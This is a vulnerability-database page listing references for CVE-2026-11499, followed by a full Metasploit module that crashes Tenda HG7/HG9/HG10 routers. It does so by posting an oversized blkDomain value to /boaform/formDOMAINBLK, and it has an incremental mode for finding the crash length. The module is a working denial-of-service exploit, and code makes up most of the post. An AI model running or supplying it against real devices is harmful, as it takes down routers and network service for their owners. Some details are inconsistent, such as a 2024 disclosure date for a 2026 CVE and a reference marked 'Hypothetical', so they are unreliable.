| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| CVE-2026-11499 | 8 Jun 202607:00 | โ | attackerkb | |
| CVE-2026-11499 | 7 Jun 202613:51 | โ | circl | |
| Tenda HG7 ็ผๅฒๅบ้่ฏฏๆผๆด | 8 Jun 202600:00 | โ | cnnvd | |
| CVE-2026-11499 | 8 Jun 202607:00 | โ | cve | |
| CVE-2026-11499 Tenda HG7HG9/HG10 formDOMAINBLK stack-based overflow | 8 Jun 202607:00 | โ | cvelist | |
| Exploit for CVE-2026-11499 | 8 Jun 202610:54 | โ | githubexploit | |
| EUVD-2026-35029 | 8 Jun 202607:00 | โ | euvd | |
| CVE-2026-11499 | 8 Jun 202609:16 | โ | nvd | |
| ๐ Tenda HG7 / HG9 / HG10 Buffer Overflow | 6 Jul 202600:00 | โ | packetstorm | |
| Tenda HG7 / HG9 / HG10 Management Interface Assessment Module | 6 Jul 202600:00 | โ | packetstormnews |
==================================================================================================================================
| # Title : Tenda HG7/HG9/HG10 formDOMAINBLK Stack Buffer Overflow Metasploit DoS Module |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.tendacn.com/material/show/105719 |
==================================================================================================================================
[+] Summary : This module is a Metasploit auxiliary scanner/DoS module designed to test a stack-based buffer overflow condition affecting specific Tenda router models through the /boaform/formDOMAINBLK endpoint.
The issue is associated with oversized input supplied to the blkDomain parameter, potentially causing service instability or device crashes.
[+] POC :
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
include Msf::Auxiliary::Dos
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Tenda HG7/HG9/HG10 formDOMAINBLK Stack Buffer Overflow DoS',
'Description' => %q{
This module triggers a stack-based buffer overflow vulnerability in the
/boaform/formDOMAINBLK endpoint of Tenda HG7, HG9, and HG10 routers.
The vulnerability exists in the 'blkDomain' parameter.
Sending an overly long string causes a crash and denial of service.
},
'Author' => ['indoushka'],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2026-11499'],
['URL', 'https://github.com/0xBlackash/CVE-2026-11499'] # Hypothetical
],
'DisclosureDate' => '2024-01-15',
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [DOS_MODULE],
'Reliability' => []
},
'DefaultOptions' => {
'RPORT' => 80,
'SSL' => false
}
)
)
register_options([
OptInt.new('PAYLOAD_LENGTH', [false, 'Length of the buffer overflow payload', 400]),
OptBool.new('INCREMENTAL', [false, 'Incrementally increase payload size', false]),
OptInt.new('STEP_SIZE', [false, 'Incremental step size', 50]),
OptInt.new('START_LENGTH', [false, 'Starting length for incremental mode', 100]),
OptInt.new('END_LENGTH', [false, 'Ending length for incremental mode', 1000]),
OptInt.new('DELAY', [false, 'Delay between requests in incremental mode (seconds)', 2])
])
end
def run_host(ip)
target_url = "http://#{ip}:#{rport}"
if datastore['INCREMENTAL']
print_status("Incremental mode - finding approximate crash offset...")
start_len = datastore['START_LENGTH']
end_len = datastore['END_LENGTH']
step = datastore['STEP_SIZE']
delay = datastore['DELAY']
(start_len..end_len).step(step) do |length|
print_status("Testing length: #{length}")
send_payload(target_url, length)
print_status("Waiting #{delay} seconds...")
sleep(delay)
end
else
send_payload(target_url, datastore['PAYLOAD_LENGTH'])
end
print_good("DoS attempt completed. Check if #{ip} is responsive.")
end
def send_payload(target_url, length)
payload = 'A' * length
data = {
'blkDomain' => payload,
'submit-url' => '/domainblk.asp',
'page' => 'domainblk'
}
begin
res = send_request_cgi({
'method' => 'POST',
'uri' => '/boaform/formDOMAINBLK',
'vars_post' => data,
'headers' => {
'Referer' => "#{target_url}/domainblk.asp"
}
}, datastore['WfsDelay'])
if res
print_good("HTTP Status: #{res.code}")
return true
else
print_status("No response (timeout/refused) - likely crashed")
return true
end
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Errno::ECONNRESET
print_status("Connection error - crash successful!")
return true
rescue => e
print_error("Error: #{e.message}")
return false
end
end
end
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation